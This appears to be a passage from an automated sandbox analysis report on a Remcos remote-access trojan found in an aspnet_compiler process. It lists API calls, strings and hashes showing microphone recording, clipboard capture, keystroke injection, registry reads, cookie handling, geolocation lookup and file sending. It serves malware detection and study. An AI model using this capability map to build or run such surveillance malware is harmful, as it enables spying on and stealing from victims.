                                                          • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                          • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                          • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                          • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                          • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                          • waveInStart.WINMM ref: 00401A81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: XCG$`=G$x=G
                                                          • API String ID: 1356121797-903574159
                                                          • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                          • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                          • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                          • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                            • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                            • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                            • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                          • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                          • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                          • TranslateMessage.USER32(?), ref: 0041C9FB
                                                          • DispatchMessageA.USER32(?), ref: 0041CA05
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                          • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                          • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                          • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                          • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                          • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                          • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                          • __alloca_probe_16.LIBCMT ref: 00452C91
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                          • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                          • __freea.LIBCMT ref: 00452DAA
                                                          • __freea.LIBCMT ref: 00452DB6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 201697637-0
                                                          • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                          • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                          • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                          • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                          • _free.LIBCMT ref: 00444714
                                                          • _free.LIBCMT ref: 0044472D
                                                          • _free.LIBCMT ref: 0044475F
                                                          • _free.LIBCMT ref: 00444768
                                                          • _free.LIBCMT ref: 00444774
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                          • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                          • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                          • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                          • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                          • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                          • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                          APIs
                                                          • ExitThread.KERNEL32 ref: 004017F4
                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                          • __Init_thread_footer.LIBCMT ref: 004017BC
                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: T=G$p[G$>G$>G
                                                          • API String ID: 1596592924-2461731529
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                            • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                            • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          APIs
                                                            • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                            • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                            • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                          • _wcslen.LIBCMT ref: 0041A8F6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                          • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 37874593-703403762
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                          • __alloca_probe_16.LIBCMT ref: 004499E2
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                          • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                          • __freea.LIBCMT ref: 00449B37
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • __freea.LIBCMT ref: 00449B40
                                                          • __freea.LIBCMT ref: 00449B65
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • API String ID: 3864826663-0
                                                          APIs
                                                          • SendInput.USER32 ref: 00418B08
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                            • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: InputSend$Virtual
                                                          • API String ID: 1167301434-0
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00415A46
                                                          • EmptyClipboard.USER32 ref: 00415A54
                                                          • CloseClipboard.USER32 ref: 00415A5A
                                                          • OpenClipboard.USER32 ref: 00415A61
                                                          • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                          • CloseClipboard.USER32 ref: 00415A89
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • API String ID: 2172192267-0
                                                          APIs
                                                          • _free.LIBCMT ref: 00447EBC
                                                          • _free.LIBCMT ref: 00447EE0
                                                          • _free.LIBCMT ref: 00448067
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                          • _free.LIBCMT ref: 00448233
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • API String ID: 314583886-0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • API String ID: 269201875-0
                                                          APIs
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • _free.LIBCMT ref: 00444086
                                                          • _free.LIBCMT ref: 0044409D
                                                          • _free.LIBCMT ref: 004440BC
                                                          • _free.LIBCMT ref: 004440D7
                                                          • _free.LIBCMT ref: 004440EE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID: J7D
                                                          • API String ID: 3033488037-1677391033
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                          • __fassign.LIBCMT ref: 0044A180
                                                          • __fassign.LIBCMT ref: 0044A19B
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                          • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                          • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • API String ID: 1324828854-0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: HE$HE
                                                          • API String ID: 269201875-1978648262
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                            • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                            • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: TUFTUF$>G$DG$DG
                                                          • API String ID: 3114080316-344394840
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          APIs
                                                            • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                            • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                            • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                          • API String ID: 1133728706-4073444585
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                          • int.LIBCPMT ref: 0040FC0F
                                                            • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                            • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                          • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: P[G
                                                          • API String ID: 2536120697-571123470
                                                          • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                          • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                          • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                          • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                          • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                          • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                          • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                          APIs
                                                            • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                          • _free.LIBCMT ref: 0044FD29
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 0044FD34
                                                          • _free.LIBCMT ref: 0044FD3F
                                                          • _free.LIBCMT ref: 0044FD93
                                                          • _free.LIBCMT ref: 0044FD9E
                                                          • _free.LIBCMT ref: 0044FDA9
                                                          • _free.LIBCMT ref: 0044FDB4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                          • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                          APIs
                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                            • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                            • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                            • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                          • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 1866151309-2070987746
                                                          • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                          • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                          • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
